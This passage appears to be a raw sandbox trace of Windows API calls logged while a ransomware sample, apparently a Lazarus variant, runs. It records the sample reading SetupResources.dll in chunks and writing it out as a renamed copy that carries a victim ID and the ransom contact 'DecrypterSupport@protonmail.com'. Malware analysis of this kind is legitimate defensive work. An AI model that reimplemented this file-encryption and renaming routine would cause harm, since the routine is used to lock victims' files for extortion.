returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.702] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.703] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.703] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.703] FindNextFileW (in: hFindFile=0x78090, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.703] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.703] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.703] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.703] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.703] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.703] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.704] AreFileApisANSI () returned 1 [0061.704] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.704] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0061.704] AreFileApisANSI () returned 1 [0061.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.704] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0061.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 46 [0061.704] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.704] GetFileType (hFile=0x420) returned 0x1 [0061.704] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.705] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0061.705] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0061.705] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0061.705] CloseHandle (hObject=0x420) returned 1 [0061.706] AreFileApisANSI () returned 1 [0061.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71bd0 [0061.706] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71bd0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 46 [0061.706] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.706] GetFileType (hFile=0x420) returned 0x1 [0061.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0061.706] CloseHandle (hObject=0x420) returned 1 [0061.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.706] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.706] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.707] AreFileApisANSI () returned 1 [0061.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0061.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 46 [0061.707] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758)) returned 1 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.707] AreFileApisANSI () returned 1 [0061.707] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0061.707] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.707] GetLastError () returned 0x0 [0061.707] SetLastError (dwErrCode=0x0) [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e3b0 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b9c8 [0061.707] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0061.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d630 [0061.708] GetLastError () returned 0x0 [0061.708] SetLastError (dwErrCode=0x0) [0061.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0061.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x717c0 [0061.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0061.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0061.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0061.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0061.708] AreFileApisANSI () returned 1 [0061.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 108 [0061.708] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd8) returned 0x51398 [0061.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=108 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 108 [0061.708] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.708] GetFileType (hFile=0x420) returned 0x1 [0061.708] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0061.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0061.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.709] AreFileApisANSI () returned 1 [0061.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x715b8 [0061.709] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned 46 [0061.709] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1029\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.709] GetFileType (hFile=0x428) returned 0x1 [0061.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0061.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.709] GetLastError () returned 0x0 [0061.709] SetLastError (dwErrCode=0x0) [0061.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.709] GetLastError () returned 0x0 [0061.709] SetLastError (dwErrCode=0x0) [0061.709] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.709] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.710] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0061.710] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0061.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0061.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d708 [0061.799] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8d438 [0061.799] GetLastError () returned 0x0 [0061.799] SetLastError (dwErrCode=0x0) [0061.799] GetLastError () returned 0x0 [0061.800] SetLastError (dwErrCode=0x0) [0061.800] GetLastError () returned 0x0 [0061.800] SetLastError (dwErrCode=0x0) [0061.800] GetLastError () returned 0x0 [0061.800] SetLastError (dwErrCode=0x0) [0061.800] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.800] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.801] GetLastError () returned 0x0 [0061.801] SetLastError (dwErrCode=0x0) [0061.801] GetLastError () returned 0x0 [0061.801] SetLastError (dwErrCode=0x0) [0061.801] GetLastError () returned 0x0 [0061.801] SetLastError (dwErrCode=0x0) [0061.802] GetLastError () returned 0x0 [0061.802] SetLastError (dwErrCode=0x0) [0061.802] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.802] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.802] GetLastError () returned 0x0 [0061.802] SetLastError (dwErrCode=0x0) [0061.802] GetLastError () returned 0x0 [0061.802] SetLastError (dwErrCode=0x0) [0061.802] GetLastError () returned 0x0 [0061.802] SetLastError (dwErrCode=0x0) [0061.802] GetLastError () returned 0x0 [0061.802] SetLastError (dwErrCode=0x0) [0061.803] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.803] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.803] GetLastError () returned 0x0 [0061.803] SetLastError (dwErrCode=0x0) [0061.803] GetLastError () returned 0x0 [0061.803] SetLastError (dwErrCode=0x0) [0061.803] GetLastError () returned 0x0 [0061.803] SetLastError (dwErrCode=0x0) [0061.803] GetLastError () returned 0x0 [0061.803] SetLastError (dwErrCode=0x0) [0061.803] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x758, lpOverlapped=0x0) returned 1 [0061.804] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.804] GetLastError () returned 0x0 [0061.804] SetLastError (dwErrCode=0x0) [0061.804] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.804] GetLastError () returned 0x0 [0061.804] SetLastError (dwErrCode=0x0) [0061.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.804] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d588 [0061.804] GetLastError () returned 0x0 [0061.804] SetLastError (dwErrCode=0x0) [0061.804] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d708 | out: hHeap=0x20000) returned 1 [0061.804] WriteFile (in: hFile=0x420, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x760, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x760, lpOverlapped=0x0) returned 1 [0061.805] GetLastError () returned 0x0 [0061.805] SetLastError (dwErrCode=0x0) [0061.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.805] GetLastError () returned 0x0 [0061.805] SetLastError (dwErrCode=0x0) [0061.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0061.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0061.805] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0061.805] CloseHandle (hObject=0x420) returned 1 [0061.806] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0061.806] CloseHandle (hObject=0x428) returned 1 [0061.806] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 